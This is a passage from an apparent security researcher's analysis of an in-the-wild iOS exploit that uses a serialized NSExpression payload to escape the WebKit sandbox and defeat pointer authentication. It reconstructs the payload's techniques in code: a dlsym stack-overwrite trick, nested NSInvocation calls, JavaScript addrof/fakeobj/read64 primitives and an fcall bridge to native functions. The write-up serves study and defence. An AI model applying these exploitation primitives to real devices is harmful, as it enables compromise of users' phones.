pthreadinvocation

pthread____converted

yWpthread

pthread_nextinvocation

pthread_next____converted

and sending and receiving mach messages:

mach_msg_sendInvocation

mach_msg_receive____converted

 mach_make_memory_entryInvocation

mach_make_memory_entry

#mach_make_memory_entryInvocationIMP

as well as interacting with IOKit:

IOServiceMatchingInvocation

IOServiceMatching

IOServiceMatchingInvocationIMP

In addition to these strings there are also three fairly large chunks of javascript source which also look fairly suspicious:

var change_scribble=[.1,.1];change_scribble[0]=.2;change_scribble[1]=.3;var scribble_element=[.1];

...

Starting up

Last time I analysed one of these I used plutil to dump out a human-readable form of the bplist. The object was small enough that I was then able to reconstruct the serialized object by hand. This wasn't going to work this time:

$ plutil -p bplist_raw | wc -l

   58995

Here's a random snipped a few tens of thousands of lines in:

14319 => {

  "$class" =>

    <CFKeyedArchiverUID 0x600001b32f60 [0x7ff85d4017d0]>

      {value = 29}

  "NSConstantValue" =>

    <CFKeyedArchiverUID 0x600001b32f40 [0x7ff85d4017d0]>

      {value = 14320}

}

14320 => 2

14321 => {

  "$class" =>

    <CFKeyedArchiverUID 0x600001b32fe0 [0x7ff85d4017d0]>

      {value = 27}

  "NSArguments" =>

    <CFKeyedArchiverUID 0x600001b32fc0 [0x7ff85d4017d0]>

      {value = 14323}

  "NSOperand" =>

    <CFKeyedArchiverUID 0x600001b32fa0 [0x7ff85d4017d0]>

      {value = 14319}

  "NSSelectorName" =>

    <CFKeyedArchiverUID 0x600001b32f80 [0x7ff85d4017d0]>

      {value = 14322}

There are a few possible analysis approaches here: I could just deserialize the object using NSKeyedUnarchiver and see what happens (potentially using dtrace to hook interesting places) but I didn't want to just learn what this serialized object does - I want to know how it works.

Another option would be parsing the output of plutil but I figured this was likely almost as much work as parsing the bplist from scratch so I decided to just write my own bplist and NSArchiver parser and go from there.

This might seem like overdoing it, but with such a huge object it was likely I was going to need to be in the position to manipulate the object quite a lot to figure out how it actually worked.

bplist

Fortunately, bplist isn't a very complicated serialization format and only takes a hundred or so lines of code to implement. Furthermore, I didn't need to support all the bplist features, just those used in the single serialized object I was investigating.

This blog post gives a great overview of the format and also links to the CoreFoundation .c file containing a comment defining the format.

A bplist serialized object has 4 sections:

  • header
  • objects
  • offsets
  • trailer

The objects section contains all the serialized objects one after the other. The offsets table contains indexes into the objects section for each object. Compound objects (arrays, sets and dictionaries) can then reference other objects via indexes into the offsets table.

bplist only supports a small number of built-in types:

null, bool, int, real, date, data, ascii string, unicode string, uid, array, set and dictionary

The serialized form of each type is pretty straightforward, and explained clearly in this comment in CFBinaryPlist.c:

Object Formats (marker byte followed by additional info in some cases)

null   0000 0000

bool   0000 1000           // false

bool   0000 1001           // true

fill   0000 1111           // fill byte

int    0001 nnnn ...       // # of bytes is 2^nnnn, big-endian bytes

real   0010 nnnn ...       // # of bytes is 2^nnnn, big-endian bytes

date   0011 0011 ...       // 8 byte float follows, big-endian bytes

data   0100 nnnn [int] ... // nnnn is number of bytes unless 1111 then int count follows, followed by bytes

string 0101 nnnn [int] ... // ASCII string, nnnn is # of chars, else 1111 then int count, then bytes

string 0110 nnnn [int] ... // Unicode string, nnnn is # of chars, else 1111 then int count, then big-endian 2-byte uint16_t

       0111 xxxx           // unused

uid    1000 nnnn ...       // nnnn+1 is # of bytes

       1001 xxxx           // unused

array  1010 nnnn [int] objref*         // nnnn is count, unless '1111', then int count follows

       1011 xxxx                       // unused

set    1100 nnnn [int] objref*         // nnnn is count, unless '1111', then int count follows

dict   1101 nnnn [int] keyref* objref* // nnnn is count, unless '1111', then int count follows

       1110 xxxx // unused

       1111 xxxx // unused

It's a Type-Length-Value encoding with the type field in the upper nibble of the first byte. There's some subtlety to decoding the variable sizes correctly, but it's all explained fairly well in the CF code. The keyref* and objref* are indexes into the eventual array of deserialized objects; the bplist header defines the size of these references (so a small object with up to 256 objects could use a single byte as a reference.)

Parsing the bplist and printing it ends up with an object with this format:

dict {

  ascii("$top"):

    dict {

      ascii("root"):

        uid(0x1)

    }

  ascii("$version"):

    int(0x186a0)

  ascii("$objects"):

    array [

      [+0]:

        ascii("$null")

      [+1]:

        dict {

          ascii("NS.relative"):

            uid(0x3)

          ascii("WK.baseURL"):

            uid(0x3)

          ascii("$0"):

            int(0xe)

          ascii("$class"):

            uid(0x2)

        }

      [+2]:

        dict {

          ascii("$classes"):

            array [

              [+0]:

                ascii("WKSecureCodingURLWrapper")

              [+1]:

                ascii("NSURL")

              [+2]:

                ascii("NSObject")

            ]

          ascii("$classname"):

            ascii("WKSecureCodingURLWrapper")

        }

...

The top level object in this bplist is a dictionary with three entries:

$version: int(100000)

$top: uid(1)

$objects: an array of dictionaries

This is the top-level format for an NSKeyedArchiver. Indirection in NSKeyedArchivers is done using the uid type, where the values are integer indexes into the $objects array. (Note that this is an extra layer of indirection, on top of the keyref/objref indirection used at the bplist layer.)

The $top dictionary has a single key "root" with value uid(1) indicating that the object serialized by the NSKeyedArchiver is encoded as the second entry in the $objects array.

Each object encoded within the NSKeyedArchiver effectively consists of two dictionaries:

one defining its properties and one defining its class. Tidying up the sample above (since dictionary keys are all ascii strings) the properties dictionary for the first object looks like this:

{

  NS.relative : uid(0x3)

  WK.baseURL :  uid(0x3)

  $0 :          int(0xe)

  $class :      uid(0x2)

}

The $class key tells us the type of object which is serialized. Its value is uid(2) which means we need to go back to the objects array and find the dictionary at that index:

{

  $classname : "WKSecureCodingURLWrapper"

  $classes   : ["WKSecureCodingURLWrapper",

                "NSURL",

                "NSObject"]

}

Note that in addition to telling us the final class (WKSecureCodingURLWrapper) it also defines the inheritance hierarchy. The entire serialized object consists of a fairly enormous graph of these two types of dictionaries defining properties and types.

It shouldn't be a surprise to see WKSecureCodingURLWrapper here; we saw it right at the end of the first section.

Finding the beginning

Since we have a custom parser we can start dumping out subsections of the object graph looking for the NSExpressions. In the end we can follow these properties to find an array of PTSection objects, each of which contains multiple PTRow objects, each with an associated condition in the form of an NSComparisonPredicate:

sections = follow(root_obj, ['NS.relative', 'NS.relative', 'NS.configDict', 'NS.skkeyset', 'components', 'NS.objects'])

Each of those PTRows contains a single predicate to evaluate - in the end the relevant parts of the payload are contained entirely in four NSExpressions.

Types

There are only a handful of primitive NSExpression family objects from which the graph is built:

NSComparisonPredicate

  NSLeftExpression

  NSRightExpression

  NSPredicateOperator

Evaluate the left and right side then return the result of comparing them with the given operator.

NSFunctionExpression

  NSSelectorName

  NSArguments

  NSOperand

Send the provided selector to the operand object passing the provided arguments, returning the return value

NSConstantValueExpression

  NSConstantValueClassName

  NSConstantValue

A constant value or Class object

NSVariableAssignmentExpression

  NSAssignmentVariable

  NSSubexpression

Evaluate the NSSubexpression and assign its value to the named variable

NSVariableExpression

  NSVariable

Return the value of the named variable

NSCustomPredicateOperator

  NSSelectorName

The name of a selector in invoke as a comparison operator

NSTernaryExpression

  NSPredicate

  NSTrueExpression

  NSFalseExpression

Evaluate the predicate then evaluate either the true or false branch depending on the value of the predicate.

E2BIG

The problem is that the object graph is simply enormous with very deep nesting. Attempts to perform simple transforms of the graph to a text representation quickly became incomprehensible with over 40 layers of nesting.

It's very unlikely that whoever crafted this serialized object actually wrote the entire payload as a single expression. Much more likely is that they used some tricks and tooling to turn a sequential series of operations into a single statement. But to figure those out we still need a better way to see what's going on.

Going DOTty

This object is a graph - so rather than trying to immediately transform it to text why not try to visualize it as a graph instead?

DOT is the graph description language used by graphviz - an open-source graph drawing package. It's pretty simple:

digraph {

 A -> B

 B -> C

 C -> A

}

Diagram showing a three-node DOT graph with a cycle from A to B to C to A.

You can also define nodes and edges separately and apply properties to them:

digraph {

A [shape=square]

B [label="foo"]

 A -> B

 B -> C

 C -> A [style=dotted]

}

A simple 3 node diagram showing different DOT node and edge styles

With the custom parser it's relatively easy to emit a dot representation of the entire NSExpression graph. But when it comes time to actually render it, progress is rather slow...

After leaving it overnight without success it seemed that perhaps a different approach again is required. Graphviz is certainly capable of rendering a graph with tens of thousands of nodes; the part which is likely failing is graphviz's attempts to layout the nodes in a clean way.

Medium data

Maybe some of the tools explicitly designed for interactively exploring significant datasets could help here. I chose to use Gephi, an open-source graph visualization platform.

I loaded the .dot file into Gephi and waited for the magic:

A screenshot of Gephi showing a graph with thousands of overlapping nodes rendered into an almost solid square of indistinguishable circles and arrows

This might take some more work.

Directing forces

The default layout seems to just position all the nodes equally in a square - not particularly useful. But using the layout menu on the left we can choose layouts which might give us some insight. Here's a force-directed layout, which emphasizes highly-connected nodes:

Screenshot of Gephi showing a large complex graph where the nodes are distinguishable and there is some clustering

Much better! I then started to investigate which nodes have large in or out degrees and figure out why. For example here we can see that a node with the label func:alloc has a huge in-degree.

Screenshot of Gephi showing the func:alloc node with a very large number of incoming graph edges

Trying to layout the graph with nodes which such high indegrees just leads to a mess (and was potentially what was slowing the graphviz tools down so much) so I started adding hacks to the custom parser to duplicate certain nodes while maintaining the semantics of the expression in order to minimize the number of crossing edges in the graph.

During this iterative process I ended up creating the graph shown at the start of this writeup, when only a handful of high in-degree nodes remained and the rest separated cleanly into clusters:

A graph rendering of the sandbox escape NSExpression payload node graph, with an eerie similarity to a human eye

Flattening

Although this created a large number of extra nodes in the graph it turns out that this has made things much easier for graphviz to layout. It still can't do the whole graph, but we can now split it into chunks which successfully render to very large SVGs. The advantage of switching back to graphviz is that we can render arbitrary information with custom node and edge labels. For example using custom shape primitives to make the arrays of NSFunctionExpression arguments stand out more clearly:

Diagram showing an NSExpression subgraph performing a bitwise operation and using variables

Here we can see nested related function calls, where the intention is clearly to pass the return value from one call as the argument to another. Starting in the bottom right of the graph shown above we can work backwards (towards the top left) to reconstruct pseudo-objective-c:

[writeInvocationName

  getArgument:

    [ [_NSPredicateUtils

        bitwiseOr: [NSNumber numberWithUnsignedLongLong:

                              [intermediateAddress: bytes]]

        with: @0x8000000000000000]] longLongValue ]

  atIndex: [@0x1 longLongValue] ]

We can also now clearly see the trick they use to execute multiple unrelated statements:

Diagram showing a graph of NSNull alloc nodes tying unrelated statements together

Multiple unrelated expressions are evaluated sequentially by passing them as arguments to an NSFunctionExpression calling [NSNull alloc]. This is a method which takes no arguments and has no side-effects (the NSNull is a singleton and alloc returns a global pointer) but the NSFunctionExpression evaluation will still evaluate all the provided arguments then discard them.

They build a huge tree of these [NSNull alloc] nodes which allows them to sequentially execute unrelated expressions.

Diagram showing nodes and edges in a tree of NSNull alloc NSFunctionExpressions

Connecting the dots

Since the return values of the evaluated arguments are discarded they use NSVariableExpressions to connect the statements semantically. These are a wrapper around an NSDictionary object which can be used to store named values. Using the custom parser we can see there are 218 different named variables. Interestingly, whilst Mach-O is stripped and all symbols were removed, that's not the case for the NSVariables - we can see their full (presumably original) names.

bplist_to_objc

Having figured out the NSNull trick they use for sequential expression evaluation it's now possible to flatten the graph to pseudo-objective-c code, splitting each argument to an [NSNull alloc] NSFunctionExpression into separate statements:

id v_detachNewThreadWithBlock:_NSFunctionExpression = [NSNumber numberWithUnsignedLongLong:[[[NSFunctionExpression alloc] initWithTarget:@"target" selectorName:@"detachNewThreadWithBlock:" arguments:@[] ] selector] ];

This is getting closer to a decompiler-type output. It's still a bit jumbled, but significantly more readable than the graph and can be refactored in a code editor.

Helping out

The expressions make use of NSPredicateUtilities for arithmetic and bitwise operations. Since we don't have to support arbitrary input, we can just hardcode the selectors which implement those operations and emit a more readable helper function call instead:

      if selector_str == 'bitwiseOr:with:':

        arg_vals = follow(o, ['NSArguments', 'NS.objects'])

        s += 'set_msb(%s)' % parse_expression(arg_vals[0], depth+1)

      elif selector_str == 'add:to:':

        arg_vals = follow(o, ['NSArguments', 'NS.objects'])

        s += 'add(%s, %s)' % (parse_expression(arg_vals[0], depth+1), parse_expression(arg_vals[1], depth+1))

This yields arithmetic statements which look like this:

[v_dlsym_lock_ptrinvocation setArgument:[set_msb(add(v_OOO_dyld_dyld, @0xa0)) longLongValue] atIndex:[@0x2 longLongValue] ];

but...why?

After all that we're left with around 1000 lines of sort-of readable pseudo-objective-C. There are a number of further tricks they use to implement things like arbitrary read and write which I manually replaced with simple assignment statements.

The attackers are already in a very strong position at this point; they can evaluate arbitrary NSExpressions, with the security bits disabled such that they can still allocate and interact with arbitrary classes. But in this case the attackers are determined to be able to call arbitrary functions, without being restricted to just Objective-C selector invocations.

The major barrier to doing this easily is PAC (pointer authentication.) The B-family PAC keys used for backwards-edge protection (e.g. return addresses on the stack) were always per-process but the A-family keys (used for forward-edge protection for things like function pointers) used to be shared across all userspace processes, meaning userspace tasks could forge signed forward-edge PAC'ed pointers which would be valid in other tasks.

With some low-level changes to the virtual memory code it's now possible for tasks to use private, isolated A-family keys as well, which means that the WebContent process can't necessarily forge forward-edge keys for other tasks (like the GPU Process.)

Most previous userspace PAC defeats were finding a way where a forged forward-edge function pointer could be used across a privilege boundary - and when forward-edge keys were shared there were a great number of such primitives. Kernel PAC defeats tended to be slightly more involved, often targeting race-conditions to create signing oracles or similar primitives. We'll see that the attackers took inspiration from those kernel-PAC defeats here...

Invoking Invocations with IMPs

An NSInvocation, as the name suggests, wraps up an Objective-C method call such that it can be called at a later point. Although conceptually in Objective-C you don't "call methods" but instead "pass messages to objects" in reality of course you do end up eventually at a branch instruction to the native code which implements the selector for the target object. It's also possible to cache the address of this native code as an IMP object (it's really just a function pointer.)

As outlined in the see-no-eval NSExpression blogpost NSInvocations can be used to get instruction pointer control from NSExpressions - with the caveat that you must provide a signed PC value. The first method they call using this primitive is the implementation of [CFPrefsSource lock]

; void __cdecl -[CFPrefsSource lock](CFPrefsSource *self, SEL)

ADD  X0, X0, #0x34

B    _os_unfair_lock_loc

They get a signed (with PACIZA) IMP for this function by calling

id os_unfair_lock_0x34_IMP = [[CFPrefsSource alloc] methodForSelector: sel(lock)]

To call that function they use two nested NSInvocations:

id invocationInner = [templateInvocation copy];

[invocationInner setTarget:(dlsym_lock_ptr - 0x34)]

[invocationInner setSelector: [@0x43434343 longLongValue]]

id invocationOuter = [templateInvocation copy];

[invocationOuter setSelector: sel(invokeUsingIMP)];

[invocationOuter setArgument: os_unfair_lock_loc_IMP

                   atIndex: @2];

They then call invoke on the outer invocation, which invokes the inner invocation via invokeUsingIMP: which allows the [CFPrefsSource lock] function implementation to be called on something which most certainly isn't a CFPrefsSource object (as the invokeWithIMP bypasses the regular Objective-C selector-to-IMP lookup process.)

Lock what?

But what is that lock, and why are they locking it? That lock is used here inside dlsym:

// dlsym() assumes symbolName passed in is same as in C source code

// dyld assumes all symbol names have an underscore prefix

BLOCK_ACCCESSIBLE_ARRAY(char, underscoredName, strlen(symbolName) + 2);

underscoredName[0] = '_';

strcpy(&underscoredName[1], symbolName);

__block Diagnostics diag;

__block Loader::ResolvedSymbol result;

if ( handle == RTLD_DEFAULT ) {

  // magic "search all in load order" handle

  __block bool found = false;

  withLoadersReadLock(^{

    for ( const dyld4::Loader* image : loaded ) {

      if ( !image->hiddenFromFlat() && image->hasExportedSymbol(diag, *this, underscoredName, Loader::shallow, &result) ) {

        found = true;

        break;

      }

    }

  });

withLoadersReadLock first takes the global lock which the invocation locked before evaluating the block which resolves the symbol:

this->libSystemHelpers->os_unfair_recursive_lock_lock_with_options(

  &(_locks.loadersLock),

  OS_UNFAIR_LOCK_NONE);

work();

this->libSystemHelpers->os_unfair_recursive_lock_unlock(

  &_locks.loadersLock);

So by taking this lock the NSExpression has ensured that any calls to dlsym in the GPU process will block waiting for this lock.

Threading the needle

Next they use the same double-invocation trick to make the following Objective-C call:

[NSThread detachNewThreadWithBlock:aBlock]

passing as the block argument a pointer to a block inside the CoreGraphics library with the following body:

void *__CGImageCreateWithPNGDataProvider_block_invoke_2()

{

  void *sym;

  if ( CGLibraryLoadImageIODYLD_once != -1 ) {

    dispatch_once(&CGLibraryLoadImageIODYLD_once,

                  &__block_literal_global_5_15015);

  }

  if ( !CGLibraryLoadImageIODYLD_handle ) {

    // fail

  }

  sym = dlsym(CGLibraryLoadImageIODYLD_handle,

                 "CGImageSourceGetType");

  if ( !sym ) {

    // fail

  }

  CGImageCreateWithPNGDataProvider = sym;

  return sym;

}

Prior to starting the thread calling that block they also perform two arbitrary writes to set:

CGLibraryLoadImageIODYLD_once = -1

and

CGLibraryLoadImageIODYLD.handle = RTLD_DEFAULT

This means that the thread running that block will reach the call to:

dlsym(CGLibraryLoadImageIODYLD_handle,

                 "CGImageSourceGetType");

then block inside the implementation of dlsym waiting to take a lock held by the NSExpression.

Sleep and repeat

They call [NSThread sleepForTimeInterval] to sleep on the NSExpression thread to ensure that the victim dlsym thread has started, then read the value of libpthread::___pthread_head, the start of a linked-list of pthreads representing all the running threads (the address of which was linked and rebased by the JS.)

They then use an unrolled loop of 100 NSTernaryExpressions to walk that linked list looking for the last entry (which has a null pthread.next field) which is the most recently-started thread.

They use a hardcoded offset into the pthread struct to find the thread's stack and create an NSData object wrapping the first page of the dlsym thread's stack:

id v_stackData = [NSData dataWithBytesNoCopy:[set_msb(v_stackEnd) longLongValue] length:[@0x4000 longLongValue] freeWhenDone:[@0x0 longLongValue] ];

Recall this code we saw earlier in the dlsym snippet:

// dlsym() assumes symbolName passed in is same as in C source code

// dyld assumes all symbol names have an underscore prefix

BLOCK_ACCCESSIBLE_ARRAY(char, underscoredName, strlen(symbolName) + 2);

underscoredName[0] = '_';

strcpy(&underscoredName[1], symbolName);

BLOCK_ACCESSIBLE_ARRAY is really creating an alloca-style local stack buffer in order to prepend an underscore to the symbol name, which explains why the NSExpression code does this next:

[v_stackData rangeOfData:@"b'_CGImageSourceGetType'" options:[@0x0 longLongValue] range:[@0x0 longLongValue] [@0x4000 longLongValue] ]

This returns an NSRange object defining where the string "_CGImageSourceGetType" appears in that page of the stack.  "CGImageSourceGetType" (without the underscore) is the hardcoded (and constant, in read-only memory) string which the block passes to dlsym.

The NSExpression then calculates the absolute address of that string on the thread stack and uses [NSData getBytes:length:] to write the contents of an NSData object containing the string "_dlsym\0\0" over the start of the  "_CGImageSourceGetType" string on the blocked dlsym thread.

Unlock and go

Using the same tricks as before to lock the lock (but this time using the IMP of [CFPrefsSource unlock] they unlock the global lock blocking the dlsym thread. This causes the block to continue executing and dlsym to complete, now returning a PACIZA-signed function pointer to dlsym instead of CGImageSourceGetType.

The block then assigns the return value of that call to dlsym to a global variable:

  CGImageCreateWithPNGDataProvider = sym;

The NSExpression calls sleepForTimeInterval again to ensure that the block has completed, then reads that global variable to get a signed function pointer to dlsym!

(It's worth noting that it used to be the case, as documented by Samuel Groß in his iMessage remote exploit writeup, that there were Objective-C methods such as [CNFileServices dlsym:] which would directly give you the ability to call dlsym and get PACIZA-signed function pointers.)

Do look up

Armed with a signed dlsym pointer they use the nested invocation trick to call dlsym 22 times to get 22 more signed function pointers, assigning them to numbered variables:

#define f_def(v_index, sym) \\

  id v_symInvocation = [v_templateInvocation copy];

  [v_#sym#Invocation setTarget:[@0xfffffffffffffffe longLongValue] ];

  [v_#sym#Invocation setSelector:[@"sym" UTF8String] ];

  id v_#sym#InvocationIMP = [v_templateInvocation copy];

  [v_#sym#InvocationIMP setSelector:[v_invokeUsingIMP:_NSFunctionExpression longLongValue] ];

  [v_writeInvocationName setSelector:[v_dlsymPtr longLongValue] ];

  [v_writeInvocationName getArgument:[set_msb([NSNumber numberWithUnsignedLongLong:[v_intermidiateAddress bytes] ]) longLongValue] atIndex:[@0x1 longLongValue] ];

  [v_#sym#InvocationIMP setArgument:[set_msb([NSNumber numberWithUnsignedLongLong:[v_intermidiateAddress bytes] ]) longLongValue] atIndex:[@0x2 longLongValue] ];

  [v_#sym#InvocationIMP setTarget:v_symInvocation ];

  [v_#sym#InvocationIMP invoke];

  id v_#sym#____converted = [NSNumber numberWithUnsignedLongLong:[@0xaaaaaaaaaaaaaaa longLongValue] ];

  [v_#sym#Invocation getReturnValue:[set_msb(add([NSNumber numberWithUnsignedLongLong:v_#sym#____converted ], @0x10)) longLongValue] ];

  id v_#sym# = v_#sym#____converted;

  id v_#index = v_#sym;

}

f_def(0, syscall)

f_def(1, task_self_trap)

f_def(2, task_get_special_port)

f_def(3, mach_port_allocate)

f_def(4, sleep)

f_def(5, mach_absolute_time)

f_def(6, mach_msg)

f_def(7, mach_msg2_trap)

f_def(8, mach_msg_send)

f_def(9, mach_msg_receive)

f_def(10, mach_make_memory_entry)

f_def(11, mach_port_type)

f_def(12, IOMainPort)

f_def(13, IOServiceMatching)

f_def(14, IOServiceGetMatchingService)

f_def(15, IOServiceOpen)

f_def(16, IOConnectCallMethod)

f_def(17, open)

f_def(18, sprintf)

f_def(19, printf)

f_def(20, OSSpinLockLock)

f_def(21, objc_msgSend)

Another path

Still not satisfied with the ability to call arbitrary (exported, named) functions from NSExpressions the exploit now takes yet another turn and comes, in a certain sense, full circle by creating a JSContext object to evaluate javascript code embedded in a string inside the NSExpression:

id v_JSContext = [[JSContext alloc] init];

[v_JSContext evaluateScript:@"function hex(b){return(\"0\"+b.toString(16)).substr(-2)}function hexlify(bytes){var res=[];for(var i=0..." ];

...

The exploit evaluates three separate scripts inside this same context:

JS 1

The first script defines a large set of utility types and functions common to many JS engine exploits. For example it defines a Struct type:

const Struct = function() {

  var buffer = new ArrayBuffer(8);

  var byteView = new Uint8Array(buffer);

  var uint32View = new Uint32Array(buffer);

  var float64View = new Float64Array(buffer);

  return {

    pack: function(type, value) {

       var view = type;

       view[0] = value;

       return new Uint8Array(buffer, 0, type.BYTES_PER_ELEMENT)

      },

    unpack: function(type, bytes) {

        if (bytes.length !== type.BYTES_PER_ELEMENT) throw Error("Invalid bytearray");

        var view = type;

        byteView.set(bytes);

        return view[0]

    },

    int8: byteView,

    int32: uint32View,

    float64: float64View

  }

}();

The majority of the code is defining a custom fully-featured Int64 type.

At the end they define two very useful helper functions:

function addrof(obj) {

  addrof_obj_ary[0] = obj;

  var addr = Int64.fromDouble(addrof_float_ary[0]);

  addrof_obj_ary[0] = null;

  return addr

}

function fakeobj(addr) {

  addrof_float_ary[0] = addr.asDouble();

  var fake = addrof_obj_ary[0];

  addrof_obj_ary[0] = null;

  return fake

}

as well as a read64() primitive:

function read64(addr) {

  read64_float_ary[0] = addr.asDouble();

  var tmp = "";

  for (var it = 0; it < 4; it++) {

    tmp = ("000" + read64_str.charCodeAt(it).toString(16)).slice(-4) + tmp

  }

  var ret = new Int64("0x" + tmp);

  return ret

}

Of course, these primitives don't actually work - they are the standard primitives which would usually be built from a JS engine vulnerability like a JIT compiler bug, but there's no vulnerability being exploited here. Instead, after this script has been evaluated the NSExpression uses the [JSContext objectForKeyedSubscript] method to look up the global objects used by those primitives and directly corrupt the underlying objects like the arrays used by addrof and fakeobj such that they work.

This sets the stage for the second of the three scripts to run:

JS 2

JS2 uses the corrupted addrof_* arrays to build a write64 primitive then declares the following dictionary:

var all_function = {

  syscall: 0n,

  mach_task_self: 1n,

  task_get_special_port: 2n,

  mach_port_allocate: 3n,

  sleep: 4n,

  mach_absolute_time: 5n,

  mach_msg: 6n,

  mach_msg2_trap: 7n,

  mach_msg_send: 8n,

  mach_msg_receive: 9n,

  mach_make_memory_entry: 10n,

  mach_port_type: 11n,

  IOMainPort: 12n,

  IOServiceMatching: 13n,

  IOServiceGetMatchingService: 14n,

  IOServiceOpen: 15n,

  IOConnectCallMethod: 16n,

  open: 17n,

  sprintf: 18n,

  printf: 19n

};

These match up perfectly with the first 20 symbols which the NSExpression looked up via dlsym.

For each of those symbols they define a JS wrapper, like for example this one for task_get_special_port:

function task_get_special_port(task, which_port, special_port) {

    return fcall(all_function["task_get_special_port"], task, which_port, special_port)

}

They declare two ArrayBuffers, one named lock and one named func_buffer:

var lock = new Uint8Array(32);

var func_buffer = new BigUint64Array(24);

They use the read64 primitive to store the address of those buffers into two more variables, then set the first byte of the lock buffer to 1:

var lock_addr = read64(addrof(lock).add(16)).noPAC().asDouble();

var func_buffer_addr = read64(addrof(func_buffer).add(16)).noPAC().asDouble();

lock[0] = 1;

They then define the fcall function which the JS wrappers use to call the native symbols:

function

fcall(func_idx,

      x0 = 0x34343434n, x1 = 1n, x2 = 2n, x3 = 3n,

      x4 = 4n, x5 = 5n, x6 = 6n, x7 = 7n,

      varargs = [0x414141410000n,

                 0x515151510000n,

                 0x616161610000n,

                 0x818181810000n])

{

  if (typeof x0 !== "bigint") x0 = BigInt(x0.toString());

  if (typeof x1 !== "bigint") x1 = BigInt(x1.toString());

  if (typeof x2 !== "bigint") x2 = BigInt(x2.toString());

  if (typeof x3 !== "bigint") x3 = BigInt(x3.toString());

  if (typeof x4 !== "bigint") x4 = BigInt(x4.toString());

  if (typeof x5 !== "bigint") x5 = BigInt(x5.toString());

  if (typeof x6 !== "bigint") x6 = BigInt(x6.toString());

  if (typeof x7 !== "bigint") x7 = BigInt(x7.toString());

  let sanitised_varargs =

    varargs.map(

      (x => typeof x !== "bigint" ? BigInt(x.toString()) : x));

  func_buffer[0] = func_idx;

  func_buffer[1] = x0;

  func_buffer[2] = x1;

  func_buffer[3] = x2;

  func_buffer[4] = x3;

  func_buffer[5] = x4;

  func_buffer[6] = x5;

  func_buffer[7] = x6;

  func_buffer[8] = x7;

  sanitised_varargs.forEach(((x, i) => {

    func_buffer[i + 9] = x

  }));

  lock[0] = 0;

  lock[4] = 0;

  while (lock[4] != 1);

  return new Int64("0x" + func_buffer[0].toString(16))

}

This coerces each argument to a BigInt then fills the func_buffer first with the index of the function to call then each argument in turn. It clears two bytes in the lock ArrayBuffer then waits for one of them to become 1 before reading the return value, effectively implementing a spinlock.

JS 2 doesn't call fcall though. We now return back to the NSExpression to analyse what must be the other side of that ArrayBuffer "shared memory" function call primitive.

In the background

Once JS 2 has been evaluated the NSExpression again uses the [JSContext objectForKeyedSubscript:] method to read the lock_addr and func_buffer_addr variables.

It then creates another NSInvocation but this time instead of using the double invocation trick it sets the target of the NSInvocation to an NSExpression; sets the selector to expressionValueWithObject: and the second argument to the context dictionary which contains the variables defined in the NSExpression. They then call performSelectorInBackground:sel(invoke), causing part of the serialized object to be evaluated in a different thread. It's that background code which we'll look at now:

Loopy landscapes

NSExpressions aren't great for building loop primitives. We already saw that the loop to traverse the linked-list of pthreads was just unrolled 100 times. This time around they want to create an infinite loop, which can't just be unrolled! Instead they use the following construct:

Diagram showing a NSNull alloc node with two arguments, both of which point to the same  child node

They build a tree where each sub-level is evaluated twice by having two arguments which both point to the same expression. Right at the bottom of this tree we find the actual loop body. There are 33 of these doubling-nodes meaning the loop body will be evaluated 2^33 times, effectively a while(1) loop.

Let's look at the body of this loop:

[v_OSSpinLockLockInvocationInstance

  setTarget:[v_functions_listener_lock longLongValue] ];

[v_OSSpinLockLockInvocationInstance

  setSelector:[@0x43434343 longLongValue] ];

[v_OSSpinLockLockInvocationInstanceIMP

  setTarget:v_OSSpinLockLockInvocationInstance ];

[v_OSSpinLockLockInvocationInstanceIMP invoke];

v_functions_listener_lock is the address of the backing buffer of the ArrayBuffer containing the "spinlock" which the JS unlock after writing all the function call parameters into the func_buffer ArrayBuffer. This calls OSSpinLockLock to lock that lock.

The NSExpression reads the function index from the func_buffer ArrayBuffer backing buffer then reads 19 argument slots, writing each 64-bit value into the corresponding slot (target, selector, arguments) of an NSInvocation. They then convert the function index into a string and call valueForKey on the context dictionary which stores all the NSExpression variables to find the variable with the provided numeric string name (recall that they defined a variable called '0' storing a PACIZA'ed pointer to "syscall".)

They use the double invocation trick to call the target function then extract the return value from the NSInvocation and write it into the func_buffer:

[v_serializedInvName getReturnValue:[set_msb(v_functions_listener_buffer) longLongValue] ];

Finally, the loop body ends with an arbitrary write to unlock the spinlock, allowing the JS which was spinning to continue and read the function call result from the ArrayBuffer.

Then back in the main NSExpression thread it evaluates one final piece of JS in the same JSContext:

JS3

Unlike JS1 and 2 and the NSExpression, JS 3 is stripped and partially obfuscated, though with some analysis most of the names can be recovered. For example, the script starts by defining a number of constants - these in fact come from a number of system headers and the values appear in exactly the same order as the system headers:

const z = 16;

const u = 17;

const m = 18;

const x = 19;

const f = 20;

const v = 21;

const b = 22;

const p = 24;

const l = 25;

const w = 26;

const y = 0;

const B = 1;

const I = 2;

const F = 3;

const U = 4;

const k = 2147483648;

const C = 1;

const N = 2;

const S = 4;

const T = 0x200000000n;

const MACH_MSG_TYPE_MOVE_RECEIVE = 16;

const MACH_MSG_TYPE_MOVE_SEND = 17;

const MACH_MSG_TYPE_MOVE_SEND_ONCE = 18;

const MACH_MSG_TYPE_COPY_SEND = 19;

const MACH_MSG_TYPE_MAKE_SEND = 20;

const MACH_MSG_TYPE_MAKE_SEND_ONCE = 21;

const MACH_MSG_TYPE_COPY_RECEIVE = 22;

const MACH_MSG_TYPE_DISPOSE_RECEIVE = 24;

const MACH_MSG_TYPE_DISPOSE_SEND = 25;

const MACH_MSG_TYPE_DISPOSE_SEND_ONCE = 26;

const MACH_MSG_PORT_DESCRIPTOR = 0;

const MACH_MSG_OOL_DESCRIPTOR = 1;

const MACH_MSG_OOL_PORTS_DESCRIPTOR = 2;

const MACH_MSG_OOL_VOLATILE_DESCRIPTOR = 3;

const MACH_MSG_GUARDED_PORT_DESCRIPTOR = 4;

const MACH_MSGH_BITS_COMPLEX = 0x80000000;

const MACH_SEND_MSG = 1;

const MACH_RCV_MSG = 2;

const MACH_RCV_LARGE = 4;

const MACH64_SEND_KOBJECT_CALL = 0x200000000n;

The code begins by using a number of symbols passed in from the outer RCE js to find the HashMap storing the mach ports implementing the WebContent to GPU Process IPC:

//WebKit::GPUProcess::GPUProcess

var WebKit::GPUProcess::GPUProcess =

  new Int64("0x0a1a0a1a0a2a0a2a");

// offset of m_webProcessConnections HashMap in GPUProcess

var offset_of_m_webProcessConnections =

  new Int64("0x0a1a0a1a0a2a0a2b"); // 136

// offset of IPC::Connection m_connection in GPUConnectionToWebProcess

var offset_of_m_connection_in_GPUConnectionToWebProcess =

